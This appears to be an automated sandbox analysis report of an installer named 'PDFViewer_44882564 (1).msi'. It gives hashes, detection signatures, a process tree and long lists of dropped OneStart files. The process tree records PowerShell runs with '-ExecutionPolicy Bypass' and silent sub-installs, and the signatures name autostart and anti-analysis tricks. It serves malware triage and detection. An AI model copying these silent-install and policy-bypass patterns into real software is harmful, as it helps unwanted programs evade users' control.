Edit tour

Windows Analysis Report
PDFViewer_44882564 (1).msi

Overview

General Information

Sample Name:PDFViewer_44882564 (1).msi
Analysis ID:1298923
MD5:299098d3040c4ad8e52e0835e82c4ca7
SHA1:4a0e233aee3854a957baac068370394a571078a3
SHA256:39c81ea1223edf1f79d04ff5baefa8b2b95b9844972d564ef769dce3cab555c9
Infos:

Detection

Score:45
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:31
Range:0 - 100

Signatures

Tries to open files direct via NTFS file id
Creates multiple autostart registry keys
Bypasses PowerShell execution policy
Yara detected Generic Downloader
Creates autostart registry keys with suspicious values (likely registry only malware)
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
Stores large binary data to the registry
Creates job files (autostart)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
EXE planting / hijacking vulnerabilities found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
DLL planting / hijacking vulnerabilities found
Adds / modifies Windows certificates
Drops PE files
Tries to load missing DLLs
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • msiexec.exe (PID: 6756 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 (1).msi" MD5: 2D9F692E71D9985F1C6237F063F6FE76)
  • msiexec.exe (PID: 6480 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 2D9F692E71D9985F1C6237F063F6FE76)
    • msiexec.exe (PID: 6508 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5ADB98630CC4B226B2004FF6626A3D5C C MD5: F9A3EEE1C3A4067702BC9A59BC894285)
      • powershell.exe (PID: 3544 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9362.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 6700 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssA3D1.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 6708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 3184 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssB4FB.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 1484 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC80A.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 4544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 1264 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE3B5.tmp.ps1" MD5: CDA48FC75952AD12D99E526D0B6BF70A)
        • conhost.exe (PID: 3900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • msiexec.exe (PID: 1588 cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\OneStartBarSetup.msi" /qn MD5: F9A3EEE1C3A4067702BC9A59BC894285)
      • msiexec.exe (PID: 4100 cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\WCSetup_OstWC.msi" /q MD5: F9A3EEE1C3A4067702BC9A59BC894285)
    • msiexec.exe (PID: 6780 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 89BFE6A67EA52C9D6229530A7603552C C MD5: F9A3EEE1C3A4067702BC9A59BC894285)
      • powershell.exe (PID: 6460 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss14E.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 2328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 5172 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss338E.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 1548 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss5F45.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 2620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 4732 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9D9A.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 3132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 4748 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssDFC8.tmp.ps1" MD5: CDA48FC75952AD12D99E526D0B6BF70A)
        • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
    • msiexec.exe (PID: 6792 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 7B048B739A129C4760975253DFD4D71B MD5: F9A3EEE1C3A4067702BC9A59BC894285)
      • powershell.exe (PID: 4272 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss68A3.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 7152 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC2FC.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
    • msiexec.exe (PID: 3924 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0149F3E23FD7725D047AE755BC5E69BF MD5: F9A3EEE1C3A4067702BC9A59BC894285)
      • powershell.exe (PID: 4320 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss129F.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 3604 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss7063.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 4728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
  • msiexec.exe (PID: 2240 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 (1).msi" MD5: 2D9F692E71D9985F1C6237F063F6FE76)
  • cleanup
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dllJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dllJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results
          Source: C:\Windows\System32\msiexec.exeEXE: C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exe
          Source: C:\Windows\System32\msiexec.exeEXE: C:\Users\user\AppData\Roaming\OneStart\bar\updater.exe
          Source: C:\Windows\System32\msiexec.exeEXE: C:\Users\user\AppData\Roaming\Microsoft\Installer\{31F4B209-D4E1-41E0-A34F-35EFF7117AE8}\icon_OneStart2.exe
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Extensions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Json.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.MemoryMappedFiles.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.NonGeneric.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\ScreenRecorderLib.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Specialized.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Unity.Container.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encoding.Extensions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Newtonsoft.Json.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_2.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TextWriterTraceListener.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Watcher.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.Shell.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.Parallel.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.CompilerServices.Unsafe.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.X509Certificates.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Extensions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Principal.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NameResolution.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.TypeConverter.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Console.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XmlDocument.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Process.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Formatters.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Json.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebSockets.Client.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Encoding.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Pipes.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Debug.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Unity.Abstractions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Requests.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XmlSerializer.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.Reader.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Queryable.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Thread.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Buffers.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.CompilerServices.VisualC.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tools.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.Extensions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Win32.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Handles.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Security.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Contracts.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XPath.XDocument.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\DBarCore.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.InteropServices.RuntimeInformation.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Sockets.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Xml.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Algorithms.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Numerics.Vectors.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NetworkInformation.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_1.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Dynamic.Runtime.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.FileVersionInfo.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebHeaderCollection.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XPath.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.StackTrace.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Calendars.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Data.Common.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Claims.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.SecureString.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TraceSource.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.RegularExpressions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\HtmlAgilityPack.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Expressions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.Extensions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_codecvt_ids.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.DriveInfo.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\vcruntime140.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Csp.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.ZipFile.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.ReaderWriter.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.AppContext.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tracing.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Http.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Memory.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Overlapped.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\vccorlib140.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebSockets.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.UnmanagedMemoryStream.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.Writer.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Parallel.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.ResourceManager.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_atomic_wait.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Concurrent.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encodings.Web.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Xaml.Behaviors.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Drawing.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ObjectModel.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\FluentWPF.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.ThreadPool.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.Http.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Ping.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\websocket-sharp.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Numerics.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XDocument.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.InteropServices.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Bcl.AsyncInterfaces.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encoding.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.IsolatedStorage.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ValueTuple.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\concrt140.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Timer.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.EventBasedAsync.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Primitives.dll

          Compliance

          barindex
          Source: C:\Windows\System32\msiexec.exeEXE: C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exe
          Source: C:\Windows\System32\msiexec.exeEXE: C:\Users\user\AppData\Roaming\OneStart\bar\updater.exe
          Source: C:\Windows\System32\msiexec.exeEXE: C:\Users\user\AppData\Roaming\Microsoft\Installer\{31F4B209-D4E1-41E0-A34F-35EFF7117AE8}\icon_OneStart2.exe
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Extensions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Json.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.MemoryMappedFiles.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.NonGeneric.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\ScreenRecorderLib.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Specialized.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Unity.Container.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encoding.Extensions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Newtonsoft.Json.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_2.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TextWriterTraceListener.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Watcher.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.Shell.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.Parallel.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.CompilerServices.Unsafe.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.X509Certificates.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Extensions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Principal.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NameResolution.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.TypeConverter.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Console.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XmlDocument.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Process.dll
